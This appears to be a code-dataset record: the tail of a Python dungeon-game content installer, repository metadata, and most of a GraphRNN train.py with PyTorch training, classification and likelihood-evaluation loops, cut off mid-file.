"zero", "one", "two","three","four","five","six","seven","eight","nine"]
).save()
db.DungeonEntry(
name = "Goblin Lair",
max_monsters = 10,
average_number_of_rooms = 15,
monsters_list = ["Goblin Rook", "Goblin Scout", "Goblin Brute"],
id_prefix = "GL",
descriptor_tags =["barrel", "cupboard", "waste", "pot", "corpses", "torches",
"bones","pit","mold","graffiti","cage","kennels","debris"],
deadends_tags = ["wall", "bottomless pit", "boulder" , "wooden obstacle",
"barricade"],
pathways_tags = ["tunnel","slope","stairs","stream","waterfall","bridge",
"shipwreck", "door", "doorway", "curtain", "corridor"]
).save()
print("Basic Dungeon Pack Installed Successfully")
def install_pack():
basic_weapons()
basic_armor()
basic_monsters()
basic_dungeon()
db.PackageNames(name = "basic").save() | 38.339161 | 86 | 0.534519 | 1,215 | 10,965 | 4.583539 | 0.147325 | 0.060334 | 0.09912 | 0.067157 | 0.810738 | 0.753995 | 0.740707 | 0.70264 | 0.66511 | 0.64859 | 0 | 0.024343 | 0.340629 | 10,965 | 286 | 87 | 38.339161 | 0.74592 | 0.005746 | 0 | 0.608871 | 1 | 0 | 0.116891 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.020161 | false | 0 | 0.008065 | 0 | 0.028226 | 0.016129 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6d369066d7963085eee27589961fc935fd4457dc | 52,277 | py | Python | train.py | jonathangomesselman/graph-generation | 72a8be30d54a414fcca9ea0fad1a62e38b85ee2f | [
"MIT"
] | 1 | 2021-12-11T16:03:06.000Z | 2021-12-11T16:03:06.000Z | train.py | jonathangomesselman/graph-generation | 72a8be30d54a414fcca9ea0fad1a62e38b85ee2f | [
"MIT"
] | null | null | null | train.py | jonathangomesselman/graph-generation | 72a8be30d54a414fcca9ea0fad1a62e38b85ee2f | [
"MIT"
] | 1 | 2021-12-11T16:03:09.000Z | 2021-12-11T16:03:09.000Z | import networkx as nx
import numpy as np
import torch
import torch.nn as nn
import torch.nn.init as init
from torch.autograd import Variable
import matplotlib.pyplot as plt
import torch.nn.functional as F
from torch import optim
from torch.optim.lr_scheduler import MultiStepLR, CosineAnnealingLR
from sklearn.decomposition import PCA
import logging
from torch.nn.utils.rnn import pad_packed_sequence, pack_padded_sequence
from time import gmtime, strftime
from sklearn.metrics import roc_curve
from sklearn.metrics import roc_auc_score
from sklearn.metrics import average_precision_score
from random import shuffle
import pickle
from tensorboard_logger import configure, log_value
import scipy.misc
import time as tm
import seaborn as sns
from utils import *
from model import *
from data import *
from args import Args
import create_graphs
# Kinda hacky but allows for using non cude on local machine
#args_temp = Args()
#print (args_temp.cuda)
#device = torch.device('cuda:{}'.format(args_temp.cuda) if torch.cuda.is_available() else 'cpu')
def train_rnn_graph_class_epoch(epoch, args, rnn, output, data_loader,
optimizer_rnn, optimizer_output,
scheduler_rnn, scheduler_output):
"""
Train the GraphRNN model for the task of graph classification
"""
classification_loss = nn.CrossEntropyLoss()
rnn.train()
output.train()
loss_sum = 0
total_correct = 0
total_predicted = 0
for batch_idx, data in enumerate(data_loader):
rnn.zero_grad()
output.zero_grad()
x_unsorted = data['x'].float()
y_unsorted = data['y'].float()
y_len_unsorted = data['len']
# Note this may be None!!
features_unsorted = data['feat'].float()
classification_labels_unsorted = data['label'].long()
y_len_max = max(y_len_unsorted)
x_unsorted = x_unsorted[:, 0:y_len_max, :]
# y_unsorted = [batch size, max number of nodes, max previous]
y_unsorted = y_unsorted[:, 0:y_len_max, :]
features_unsorted = features_unsorted[:, 0:y_len_max, :]
# initialize lstm hidden state according to batch size
rnn.hidden = rnn.init_hidden(batch_size=x_unsorted.size(0))
# output.hidden = output.init_hidden(batch_size=x_unsorted.size(0)*x_unsorted.size(1))
# sort input graphs!
y_len,sort_index = torch.sort(y_len_unsorted,0,descending=True)
y_len = y_len.numpy().tolist()
x = torch.index_select(x_unsorted,0,sort_index)
y = torch.index_select(y_unsorted,0,sort_index)
classification_labels = torch.index_select(classification_labels_unsorted, 0, sort_index)
# Sort the node features
if args.node_features:
features = torch.index_select(features_unsorted,0,sort_index)
# input, output for output rnn module
# a smart use of pytorch builtin function: pack variable--b1_l1,b2_l1,...,b1_l2,b2_l2,...
y_reshape = pack_padded_sequence(y,y_len,batch_first=True).data
# reverse y_reshape, so that their lengths are sorted, add dimension
idx = [i for i in range(y_reshape.size(0)-1, -1, -1)]
idx = torch.LongTensor(idx)
y_reshape = y_reshape.index_select(0, idx)
y_reshape = y_reshape.view(y_reshape.size(0),y_reshape.size(1),1)
output_x = torch.cat((torch.ones(y_reshape.size(0),1,1),y_reshape[:,0:-1,0:1]),dim=1)
output_y = y_reshape
# batch size for output module: sum(y_len)
output_y_len = []
output_y_len_bin = np.bincount(np.array(y_len))
for i in range(len(output_y_len_bin)-1,0,-1):
count_temp = np.sum(output_y_len_bin[i:]) # count how many y_len is above i
output_y_len.extend([min(i,y.size(2))]*count_temp) # put them in output_y_len; max value should not exceed y.size(2)
# pack into variable
x = Variable(x).to(device)
y = Variable(y).to(device)
classification_labels = Variable(classification_labels).to(device)
if args.node_features:
features = Variable(features).to(device)
output_x = Variable(output_x).to(device)
output_y = Variable(output_y).to(device)
# Note that classification holds the predictions
# for the graph classification task!
h, classification = rnn(x, features_raw=features,pack=True, input_len=y_len)
h = pack_padded_sequence(h,y_len,batch_first=True).data # get packed hidden vector
# reverse h
idx = [i for i in range(h.size(0) - 1, -1, -1)]
idx = Variable(torch.LongTensor(idx)).to(device)
h = h.index_select(0, idx)
hidden_null = Variable(torch.zeros(args.num_layers-1, h.size(0), h.size(1))).to(device)
output.hidden = torch.cat((h.view(1,h.size(0),h.size(1)),hidden_null),dim=0) # num_layers, batch_size, hidden_size
y_pred = output(output_x, pack=True, input_len=output_y_len)
y_pred = F.sigmoid(y_pred)
# clean
y_pred = pack_padded_sequence(y_pred, output_y_len, batch_first=True)
y_pred = pad_packed_sequence(y_pred, batch_first=True)[0]
output_y = pack_padded_sequence(output_y,output_y_len,batch_first=True)
output_y = pad_packed_sequence(output_y,batch_first=True)[0]
classifier_loss = classification_loss(classification, classification_labels)
# use cross entropy loss
# Let us try to combine both the generative and classification losses!!
generative_loss = binary_cross_entropy_weight(y_pred, output_y)
loss = args.classification_weight * classifier_loss + args.gen_weight * generative_loss
# Combine the generative loss and the classification loss!
# Note that in the semi-supervised setting, we could have
# the classification loss only be over a smaller masked
# threshold of the training graphs. i.e. we could have a large
# number of graphs to actually train on where only some of them
# are actually labeled. Would give more data for the generative
# model.
loss.backward()
# update deterministic and lstm
optimizer_output.step()
optimizer_rnn.step()
scheduler_output.step()
scheduler_rnn.step()
loss_sum += loss.item()
# Should likely do like f1 score
total_correct += num_correct(classification, classification_labels)
total_predicted += classification_labels.shape[0]
# Get avg. batch loss
avg_loss = loss_sum / (batch_idx + 1)
accuracy = float(total_correct) / total_predicted
if epoch % args.epochs_log==0: # only output first batch's statistics
print('Epoch: {}/{}, train loss: {:.6f}, train accuracy: {}, num_layer: {}, hidden: {}'.format(
epoch, args.epochs,avg_loss, accuracy, args.num_layers, args.hidden_size_rnn))
return avg_loss, accuracy
def test_rnn_graph_class_epoch(epoch, args, rnn, output, data_loader, trails=50):
"""
Test the graph-level rnn's ability to generate meaningful
embeddings for graph classifciation. While we use the whole
graphRNN for training (also including the generative modeling
loss), here we technically only need the output from the
graph level RNN.
"""
classification_loss = nn.CrossEntropyLoss()
rnn.eval()
output.eval()
loss_sum = 0
# Calculate avg. accuracy over trails
# different random graph permutations.
# This helps to hopefully deal with issues
# of permutation invariance.
running_accuracy = 0
for i in range(trails):
trail_correct = 0
trail_predicted = 0
trail_loss = 0
for batch_idx, data in enumerate(data_loader):
rnn.zero_grad()
output.zero_grad()
x_unsorted = data['x'].float()
y_len_unsorted = data['len']
classification_labels_unsorted = data['label'].long()
features_unsorted = data['feat'].float()
y_len_max = max(y_len_unsorted)
x_unsorted = x_unsorted[:, 0:y_len_max, :]
features_unsorted = features_unsorted[:, 0:y_len_max, :]
# initialize lstm hidden state according to batch size
rnn.hidden = rnn.init_hidden(batch_size=x_unsorted.size(0))
# output.hidden = output.init_hidden(batch_size=x_unsorted.size(0)*x_unsorted.size(1))
# sort input
y_len,sort_index = torch.sort(y_len_unsorted,0,descending=True)
y_len = y_len.numpy().tolist()
x = torch.index_select(x_unsorted,0,sort_index)
classification_labels = torch.index_select(classification_labels_unsorted, 0, sort_index)
# Sort the node features
if args.node_features:
features = torch.index_select(features_unsorted,0,sort_index)
# pack into variable
x = Variable(x).to(device)
classification_labels = Variable(classification_labels).to(device)
if args.node_features:
features = Variable(features).to(device)
# Classification holds the predictions for the graph classification task!
h, classification = rnn(x, features_raw=features, pack=True, input_len=y_len)
classifier_loss = classification_loss(classification, classification_labels)
trail_loss += classifier_loss.item()
trail_correct += num_correct(classification, classification_labels)
trail_predicted += classification_labels.shape[0]
# Keep running accuracy metrics
trail_acc = float(trail_correct) / trail_predicted
running_accuracy += trail_acc
trail_loss = trail_loss / (batch_idx + 1)
loss_sum += trail_loss
avg_loss = loss_sum / float(trails)
avg_accuracy = float(running_accuracy) / trails
return avg_loss, avg_accuracy
def train_graph_class(args, dataset_train, dataset_test, rnn, output):
# check if load existing model
if args.load:
fname = args.model_save_path + args.fname + 'lstm_' + str(args.load_epoch) + '.dat'
rnn.load_state_dict(torch.load(fname))
fname = args.model_save_path + args.fname + 'output_' + str(args.load_epoch) + '.dat'
output.load_state_dict(torch.load(fname))
args.lr = 0.00001
epoch = args.load_epoch
print('model loaded!, lr: {}'.format(args.lr))
else:
epoch = 1
# initialize optimizer
optimizer_rnn = optim.Adam(list(rnn.parameters()), lr=args.lr)
optimizer_output = optim.Adam(list(output.parameters()), lr=args.lr)
# Play with this!!!
if args.scheduler == 'step':
scheduler_rnn = MultiStepLR(optimizer_rnn, milestones=args.milestones, gamma=args.lr_rate)
scheduler_output = MultiStepLR(optimizer_output, milestones=args.milestones, gamma=args.lr_rate)
elif args.scheduler == 'cos':
scheduler_rnn = CosineAnnealingLR(optimizer_rnn, T_max=args.epochs)
scheduler_output = CosineAnnealingLR(optimizer_output, T_max=args.epochs)
# start main loop
time_all = np.zeros(args.epochs)
while epoch<=args.epochs:
time_start = tm.time()
train_rnn_graph_class_epoch(epoch, args, rnn, output, dataset_train,
optimizer_rnn, optimizer_output,
scheduler_rnn, scheduler_output)
time_end = tm.time()
time_all[epoch - 1] = time_end - time_start
# test the models performance on graph classification!
if epoch % args.epochs_test == 0 and epoch>=args.epochs_test_start:
avg_test_loss, avg_test_acc = test_rnn_graph_class_epoch(epoch, args, rnn, output, dataset_test)
print('Test done - Avg Test loss: {:.5f}, Avg Test accuracy: {}'.format(avg_test_loss, avg_test_acc))
# save model checkpoint
if args.save:
if epoch % args.epochs_save == 0:
fname = args.model_save_path + args.fname + 'lstm_' + str(epoch) + '.dat'
torch.save(rnn.state_dict(), fname)
fname = args.model_save_path + args.fname + 'output_' + str(epoch) + '.dat'
torch.save(output.state_dict(), fname)
epoch += 1
np.save(args.timing_save_path+args.fname,time_all)
# Trains the model. Not super important to understand the details of
def train_rnn_epoch(epoch, args, rnn, output, data_loader,
optimizer_rnn, optimizer_output,
scheduler_rnn, scheduler_output):
rnn.train()
output.train()
loss_sum = 0
for batch_idx, data in enumerate(data_loader):
rnn.zero_grad()
output.zero_grad()
x_unsorted = data['x'].float()
y_unsorted = data['y'].float()
y_len_unsorted = data['len']
y_len_max = max(y_len_unsorted)
x_unsorted = x_unsorted[:, 0:y_len_max, :]
# y_unsorted = [batch size, max number of nodes, max previous]
y_unsorted = y_unsorted[:, 0:y_len_max, :]
# initialize lstm hidden state according to batch size
rnn.hidden = rnn.init_hidden(batch_size=x_unsorted.size(0))
# output.hidden = output.init_hidden(batch_size=x_unsorted.size(0)*x_unsorted.size(1))
# sort input
y_len,sort_index = torch.sort(y_len_unsorted,0,descending=True)
y_len = y_len.numpy().tolist()
x = torch.index_select(x_unsorted,0,sort_index)
y = torch.index_select(y_unsorted,0,sort_index)
# input, output for output rnn module
# a smart use of pytorch builtin function: pack variable--b1_l1,b2_l1,...,b1_l2,b2_l2,...
y_reshape = pack_padded_sequence(y,y_len,batch_first=True).data
# reverse y_reshape, so that their lengths are sorted, add dimension
idx = [i for i in range(y_reshape.size(0)-1, -1, -1)]
idx = torch.LongTensor(idx)
y_reshape = y_reshape.index_select(0, idx)
y_reshape = y_reshape.view(y_reshape.size(0),y_reshape.size(1),1)
output_x = torch.cat((torch.ones(y_reshape.size(0),1,1),y_reshape[:,0:-1,0:1]),dim=1)
output_y = y_reshape
# batch size for output module: sum(y_len)
output_y_len = []
output_y_len_bin = np.bincount(np.array(y_len))
for i in range(len(output_y_len_bin)-1,0,-1):
count_temp = np.sum(output_y_len_bin[i:]) # count how many y_len is above i
output_y_len.extend([min(i,y.size(2))]*count_temp) # put them in output_y_len; max value should not exceed y.size(2)
# pack into variable
x = Variable(x).to(device)
y = Variable(y).to(device)
output_x = Variable(output_x).to(device)
output_y = Variable(output_y).to(device)
# print(output_y_len)
# print('len',len(output_y_len))
# print('y',y.size())
# print('output_y',output_y.size())
# if using ground truth to train
h = rnn(x, pack=True, input_len=y_len)
h = pack_padded_sequence(h,y_len,batch_first=True).data # get packed hidden vector
# reverse h
idx = [i for i in range(h.size(0) - 1, -1, -1)]
idx = Variable(torch.LongTensor(idx)).to(device)
h = h.index_select(0, idx)
hidden_null = Variable(torch.zeros(args.num_layers-1, h.size(0), h.size(1))).to(device)
output.hidden = torch.cat((h.view(1,h.size(0),h.size(1)),hidden_null),dim=0) # num_layers, batch_size, hidden_size
y_pred = output(output_x, pack=True, input_len=output_y_len)
y_pred = F.sigmoid(y_pred)
# clean
y_pred = pack_padded_sequence(y_pred, output_y_len, batch_first=True)
y_pred = pad_packed_sequence(y_pred, batch_first=True)[0]
output_y = pack_padded_sequence(output_y,output_y_len,batch_first=True)
output_y = pad_packed_sequence(output_y,batch_first=True)[0]
# use cross entropy loss
loss = binary_cross_entropy_weight(y_pred, output_y)
loss.backward()
# update deterministic and lstm
optimizer_output.step()
optimizer_rnn.step()
scheduler_output.step()
scheduler_rnn.step()
if epoch % args.epochs_log==0 and batch_idx==0: # only output first batch's statistics
print('Epoch: {}/{}, train loss: {:.6f}, graph type: {}, num_layer: {}, hidden: {}'.format(
epoch, args.epochs,loss.data[0], args.graph_type, args.num_layers, args.hidden_size_rnn))
# logging
log_value('loss_'+args.fname, loss.data[0], epoch*args.batch_ratio+batch_idx)
feature_dim = y.size(1)*y.size(2)
loss_sum += loss.data[0]*feature_dim
return loss_sum/(batch_idx+1)
# Not important
def test_rnn_epoch(epoch, args, rnn, output, test_batch_size=16):
rnn.hidden = rnn.init_hidden(test_batch_size)
rnn.eval()
output.eval()
# generate graphs
max_num_node = int(args.max_num_node)
y_pred_long = Variable(torch.zeros(test_batch_size, max_num_node, args.max_prev_node)).to(device) # discrete prediction
x_step = Variable(torch.ones(test_batch_size,1,args.max_prev_node)).to(device)
for i in range(max_num_node):
h = rnn(x_step)
# output.hidden = h.permute(1,0,2)
hidden_null = Variable(torch.zeros(args.num_layers - 1, h.size(0), h.size(2))).to(device)
output.hidden = torch.cat((h.permute(1,0,2), hidden_null),
dim=0) # num_layers, batch_size, hidden_size
x_step = Variable(torch.zeros(test_batch_size,1,args.max_prev_node)).to(device)
output_x_step = Variable(torch.ones(test_batch_size,1,1)).to(device)
for j in range(min(args.max_prev_node,i+1)):
output_y_pred_step = output(output_x_step)
output_x_step = sample_sigmoid(output_y_pred_step, sample=True, sample_time=1)
x_step[:,:,j:j+1] = output_x_step
output.hidden = Variable(output.hidden.data).to(device)
y_pred_long[:, i:i + 1, :] = x_step
rnn.hidden = Variable(rnn.hidden.data).to(device)
y_pred_long_data = y_pred_long.data.long()
# save graphs as pickle
G_pred_list = []
for i in range(test_batch_size):
adj_pred = decode_adj(y_pred_long_data[i].cpu().numpy())
G_pred = get_graph(adj_pred) # get a graph from zero-padded adj
G_pred_list.append(G_pred)
return G_pred_list
########### train function for LSTM + VAE
def train(args, dataset_train, rnn, output):
# check if load existing model
if args.load:
fname = args.model_save_path + args.fname + 'lstm_' + str(args.load_epoch) + '.dat'
rnn.load_state_dict(torch.load(fname))
fname = args.model_save_path + args.fname + 'output_' + str(args.load_epoch) + '.dat'
output.load_state_dict(torch.load(fname))
args.lr = 0.00001
epoch = args.load_epoch
print('model loaded!, lr: {}'.format(args.lr))
else:
epoch = 1
# initialize optimizer
optimizer_rnn = optim.Adam(list(rnn.parameters()), lr=args.lr)
optimizer_output = optim.Adam(list(output.parameters()), lr=args.lr)
scheduler_rnn = MultiStepLR(optimizer_rnn, milestones=args.milestones, gamma=args.lr_rate)
scheduler_output = MultiStepLR(optimizer_output, milestones=args.milestones, gamma=args.lr_rate)
# start main loop
time_all = np.zeros(args.epochs)
while epoch<=args.epochs:
time_start = tm.time()
# train
if 'GraphRNN_VAE' in args.note:
train_vae_epoch(epoch, args, rnn, output, dataset_train,
optimizer_rnn, optimizer_output,
scheduler_rnn, scheduler_output)
elif 'GraphRNN_MLP' in args.note:
train_mlp_epoch(epoch, args, rnn, output, dataset_train,
optimizer_rnn, optimizer_output,
scheduler_rnn, scheduler_output)
elif 'GraphRNN_RNN' in args.note:
if args.graph_classification:
train_rnn_graph_class_epoch(epoch, args, rnn, output, dataset_train,
optimizer_rnn, optimizer_output,
scheduler_rnn, scheduler_output)
else:
train_rnn_epoch(epoch, args, rnn, output, dataset_train,
optimizer_rnn, optimizer_output,
scheduler_rnn, scheduler_output)
time_end = tm.time()
time_all[epoch - 1] = time_end - time_start
# test
if epoch % args.epochs_test == 0 and epoch>=args.epochs_test_start:
for sample_time in range(1,4):
G_pred = []
while len(G_pred)<args.test_total_size:
if 'GraphRNN_VAE' in args.note:
G_pred_step = test_vae_epoch(epoch, args, rnn, output, test_batch_size=args.test_batch_size,sample_time=sample_time)
elif 'GraphRNN_MLP' in args.note:
G_pred_step = test_mlp_epoch(epoch, args, rnn, output, test_batch_size=args.test_batch_size,sample_time=sample_time)
elif 'GraphRNN_RNN' in args.note:
G_pred_step = test_rnn_epoch(epoch, args, rnn, output, test_batch_size=args.test_batch_size)
G_pred.extend(G_pred_step)
# save graphs
fname = args.graph_save_path + args.fname_pred + str(epoch) +'_'+str(sample_time) + '.dat'
save_graph_list(G_pred, fname)
if 'GraphRNN_RNN' in args.note:
break
print('test done, graphs saved')
# save model checkpoint
if args.save:
if epoch % args.epochs_save == 0:
fname = args.model_save_path + args.fname + 'lstm_' + str(epoch) + '.dat'
torch.save(rnn.state_dict(), fname)
fname = args.model_save_path + args.fname + 'output_' + str(epoch) + '.dat'
torch.save(output.state_dict(), fname)
epoch += 1
np.save(args.timing_save_path+args.fname,time_all)
# Given a data_loader full of graphs, runs through the
# data loader once to calculate the nll for every graph
# in the dataset
def rnn_data_nll(args, rnn, output, data_loader):
rnn.train()
output.train()
# Get the nlls for every graph in the dataset
nlls = []
avg_nlls = []
for batch_idx, data in enumerate(data_loader):
rnn.zero_grad()
output.zero_grad()
x_unsorted = data['x'].float()
y_unsorted = data['y'].float()
y_len_unsorted = data['len']
y_len_max = max(y_len_unsorted)
x_unsorted = x_unsorted[:, 0:y_len_max, :]
y_unsorted = y_unsorted[:, 0:y_len_max, :]
# initialize lstm hidden state according to batch size
rnn.hidden = rnn.init_hidden(batch_size=x_unsorted.size(0))
# sort input
y_len,sort_index = torch.sort(y_len_unsorted,0,descending=True)
y_len = y_len.numpy().tolist()
x = torch.index_select(x_unsorted,0,sort_index)
y = torch.index_select(y_unsorted,0,sort_index)
# input, output for output rnn module
# a smart use of pytorch builtin function: pack variable--b1_l1,b2_l1,...,b1_l2,b2_l2,...
# If batch size = 1 then nothing changes here except the batch dimension is removed
y_reshape = pack_padded_sequence(y,y_len,batch_first=True).data
# reverse y_reshape, so that their lengths are sorted, add dimension
idx = [i for i in range(y_reshape.size(0)-1, -1, -1)]
idx = torch.LongTensor(idx)
y_reshape = y_reshape.index_select(0, idx)
y_reshape = y_reshape.view(y_reshape.size(0),y_reshape.size(1),1)
output_x = torch.cat((torch.ones(y_reshape.size(0),1,1),y_reshape[:,0:-1,0:1]),dim=1) # What is going on here?
output_y = y_reshape
# batch size for output module: sum(y_len)
output_y_len = []
output_y_len_bin = np.bincount(np.array(y_len))
for i in range(len(output_y_len_bin)-1,0,-1):
count_temp = np.sum(output_y_len_bin[i:]) # count how many y_len is above i
output_y_len.extend([min(i,y.size(2))]*count_temp) # put them in output_y_len; max value should not exceed y.size(2)
# pack into variable
x = Variable(x).to(device)
y = Variable(y).to(device)
output_x = Variable(output_x).to(device)
output_y = Variable(output_y).to(device)
h = rnn(x, pack=True, input_len=y_len)
h = pack_padded_sequence(h,y_len,batch_first=True).data # get packed hidden vector
# reverse h
idx = [i for i in range(h.size(0) - 1, -1, -1)]
idx = Variable(torch.LongTensor(idx)).to(device)
h = h.index_select(0, idx)
hidden_null = Variable(torch.zeros(args.num_layers-1, h.size(0), h.size(1))).to(device)
output.hidden = torch.cat((h.view(1,h.size(0),h.size(1)),hidden_null),dim=0) # num_layers, ??, hidden_size
y_pred = output(output_x, pack=True, input_len=output_y_len)
y_pred = F.sigmoid(y_pred)
# clean
y_pred = pack_padded_sequence(y_pred, output_y_len, batch_first=True)
y_pred = pad_packed_sequence(y_pred, batch_first=True)[0]
output_y = pack_padded_sequence(output_y,output_y_len,batch_first=True)
output_y = pad_packed_sequence(output_y,batch_first=True)[0]
# How could we get the last hidden state to somehow do graph level prediction?
loss = binary_cross_entropy_weight(y_pred, output_y)
# Because the BCELoss by default takes the mean over the
# output, we want to multiply by the dimension of the feature
# space to maintain the sum over the log probabilities for the
# component of each sequence.
# ---------------------------
# We could also use the BCE with reduction flag 'sum'
feature_dim = y_pred.size(0)*y_pred.size(1)
# Note that here y.size(0) = 1
avg_loss = loss.data[0]
loss = loss.data[0]*feature_dim/y.size(0)
# Add the loss to the nll for all the data
nlls.append(loss.item())
avg_nlls.append(avg_loss.item())
return nlls, avg_nlls
# This function gets the loglikelihoods of the data
def calc_nll(args, data_loader, rnn, output, max_iter=100, load_epoch=3000, train_dataset=None, log=10):
"""
C
"""
'''
# Set the epoch we are loading from
args.load_epoch = load_epoch
if train_dataset:
fname = args.note + '_' + train_dataset + '_' + str(args.num_layers) + '_' + str(args.hidden_size_rnn) + '_'
fname_rnn = args.model_save_path + fname + 'lstm_' + str(args.load_epoch) + '.dat'
fname_out = args.model_save_path + fname + 'output_' + str(args.load_epoch) + '.dat'
else:
fname_rnn = args.model_save_path + args.fname + 'lstm_' + str(args.load_epoch) + '.dat'
fname_out = args.model_save_path + args.fname + 'output_' + str(args.load_epoch) + '.dat'
print (fname_rnn)
rnn.load_state_dict(torch.load(fname_rnn))
output.load_state_dict(torch.load(fname_out))
epoch = args.load_epoch
print('model loaded!, epoch: {}'.format(args.load_epoch))
'''
# Calculate nll over dataset max_iter times,
# to test robustness to permutations of the bfs
# ordered adjacency matrix for the same graphs.
nlls = []
avg_nlls = []
for i in range(max_iter):
nll, avg_nll = rnn_data_nll(args, rnn, output, data_loader)
# Logging info
# May want to also include std statistics
if (i + 1) % log == 0:
print ("Iteration:", i + 1)
print ("Average Nll over train data:", np.mean(avg_nll))
nlls.extend(nll)
avg_nlls.extend(avg_nll)
return nlls, avg_nlls
# Not used!
def analyze_nll(args, dataset_train, dataset_test, rnn, output,graph_validate_len,graph_test_len, max_iter = 1000, dataset=None):
"""
Given a trained model, calculate the negative log likelihoods for each data point in the
train and test set and then create a histogram to display the distribution of nlls.
"""
if dataset:
fname = args.note + '_' + dataset + '_' + str(args.num_layers) + '_' + str(args.hidden_size_rnn) + '_'
fname_rnn = args.model_save_path + fname + 'lstm_' + str(args.load_epoch) + '.dat'
fname_out = args.model_save_path + fname + 'output_' + str(args.load_epoch) + '.dat'
else:
fname_rnn = args.model_save_path + args.fname + 'lstm_' + str(args.load_epoch) + '.dat'
fname_out = args.model_save_path + args.fname + 'output_' + str(args.load_epoch) + '.dat'
rnn.load_state_dict(torch.load(fname_rnn))
output.load_state_dict(torch.load(fname_out))
epoch = args.load_epoch
print('model loaded!, epoch: {}'.format(args.load_epoch))
for i in range(10):
print (i)
nlls_train, _ = rnn_data_nll(args, rnn, output, dataset_train)
print (np.mean(nlls_train))
#nll_test = rnn_data_nll(epoch, args, rnn, output, dataset_test)
# Make histogram
#n, bins, patches = plt.hist(nlls_train, 10, rwidth=0.3, facecolor='g', alpha=0.75)
#print (bins)
#plt.xlabel('NNL')
#plt.ylabel('Count')
#plt.title('Histogram of IQ')
#plt.text(60, .025, r'$\mu=100,\ \sigma=15$')
#plt.xlim(40, 160)
#plt.ylim(0, 0.03)
#plt.xscale("log")
#plt.yscale("log")
#plt.grid(True)
#plt.show()
_, be = np.histogram(nlls_train, bins='auto')
#print (len(be))
#plt.hist(nlls_train, 20, histtype='stepfilled', edgecolor='black', log=True, normed=True)
#plt.xscale("log")
#plt.show()
plt.figure()
sns.distplot(nlls_train, kde=True)
#plt.xlim([0, 55])
plt.show()
#plt.savefig("Histogram.png")
print('NLL evaluation done')
#### OLD UNUSED CODE ####
'''
########### for graph completion task
def train_graph_completion(args, dataset_test, rnn, output):
fname = args.model_save_path + args.fname + 'lstm_' + str(args.load_epoch) + '.dat'
rnn.load_state_dict(torch.load(fname))
fname = args.model_save_path + args.fname + 'output_' + str(args.load_epoch) + '.dat'
output.load_state_dict(torch.load(fname))
epoch = args.load_epoch
print('model loaded!, epoch: {}'.format(args.load_epoch))
for sample_time in range(1,4):
if 'GraphRNN_MLP' in args.note:
G_pred = test_mlp_partial_simple_epoch(epoch, args, rnn, output, dataset_test,sample_time=sample_time)
if 'GraphRNN_VAE' in args.note:
G_pred = test_vae_partial_epoch(epoch, args, rnn, output, dataset_test,sample_time=sample_time)
# save graphs
fname = args.graph_save_path + args.fname_pred + str(epoch) +'_'+str(sample_time) + 'graph_completion.dat'
save_graph_list(G_pred, fname)
print('graph completion done, graphs saved')
# Not used and not important!
def train_rnn_forward_epoch(epoch, args, rnn, output, data_loader):
rnn.train()
output.train()
loss_sum = 0
for batch_idx, data in enumerate(data_loader):
rnn.zero_grad()
output.zero_grad()
x_unsorted = data['x'].float()
y_unsorted = data['y'].float()
y_len_unsorted = data['len']
y_len_max = max(y_len_unsorted)
x_unsorted = x_unsorted[:, 0:y_len_max, :]
y_unsorted = y_unsorted[:, 0:y_len_max, :]
# initialize lstm hidden state according to batch size
rnn.hidden = rnn.init_hidden(batch_size=x_unsorted.size(0))
# output.hidden = output.init_hidden(batch_size=x_unsorted.size(0)*x_unsorted.size(1))
# sort input
y_len,sort_index = torch.sort(y_len_unsorted,0,descending=True)
y_len = y_len.numpy().tolist()
x = torch.index_select(x_unsorted,0,sort_index)
y = torch.index_select(y_unsorted,0,sort_index)
# input, output for output rnn module
# a smart use of pytorch builtin function: pack variable--b1_l1,b2_l1,...,b1_l2,b2_l2,...
y_reshape = pack_padded_sequence(y,y_len,batch_first=True).data
# reverse y_reshape, so that their lengths are sorted, add dimension
idx = [i for i in range(y_reshape.size(0)-1, -1, -1)]
idx = torch.LongTensor(idx)
y_reshape = y_reshape.index_select(0, idx)
y_reshape = y_reshape.view(y_reshape.size(0),y_reshape.size(1),1)
output_x = torch.cat((torch.ones(y_reshape.size(0),1,1),y_reshape[:,0:-1,0:1]),dim=1)
output_y = y_reshape
# batch size for output module: sum(y_len)
output_y_len = []
output_y_len_bin = np.bincount(np.array(y_len))
for i in range(len(output_y_len_bin)-1,0,-1):
count_temp = np.sum(output_y_len_bin[i:]) # count how many y_len is above i
output_y_len.extend([min(i,y.size(2))]*count_temp) # put them in output_y_len; max value should not exceed y.size(2)
# pack into variable
x = Variable(x).to(device)
y = Variable(y).to(device)
output_x = Variable(output_x).to(device)
output_y = Variable(output_y).to(device)
# print(output_y_len)
# print('len',len(output_y_len))
# print('y',y.size())
# print('output_y',output_y.size())
# if using ground truth to train
h = rnn(x, pack=True, input_len=y_len)
h = pack_padded_sequence(h,y_len,batch_first=True).data # get packed hidden vector
# reverse h
idx = [i for i in range(h.size(0) - 1, -1, -1)]
idx = Variable(torch.LongTensor(idx)).to(device)
h = h.index_select(0, idx)
hidden_null = Variable(torch.zeros(args.num_layers-1, h.size(0), h.size(1))).to(device)
output.hidden = torch.cat((h.view(1,h.size(0),h.size(1)),hidden_null),dim=0) # num_layers, batch_size, hidden_size
y_pred = output(output_x, pack=True, input_len=output_y_len)
y_pred = F.sigmoid(y_pred)
# clean
y_pred = pack_padded_sequence(y_pred, output_y_len, batch_first=True)
y_pred = pad_packed_sequence(y_pred, batch_first=True)[0]
output_y = pack_padded_sequence(output_y,output_y_len,batch_first=True)
output_y = pad_packed_sequence(output_y,batch_first=True)[0]
# use cross entropy loss
loss = binary_cross_entropy_weight(y_pred, output_y)
if epoch % args.epochs_log==0 and batch_idx==0: # only output first batch's statistics
print('Epoch: {}/{}, train loss: {:.6f}, graph type: {}, num_layer: {}, hidden: {}'.format(
epoch, args.epochs,loss.data[0], args.graph_type, args.num_layers, args.hidden_size_rnn))
# logging
log_value('loss_'+args.fname, loss.data[0], epoch*args.batch_ratio+batch_idx)
# print(y_pred.size())
feature_dim = y_pred.size(0)*y_pred.size(1)
loss_sum += loss.data[0]*feature_dim/y.size(0)
return loss_sum/(batch_idx+1)
########### for NLL evaluation
def train_nll(args, dataset_train, dataset_test, rnn, output,graph_validate_len,graph_test_len, max_iter = 1000):
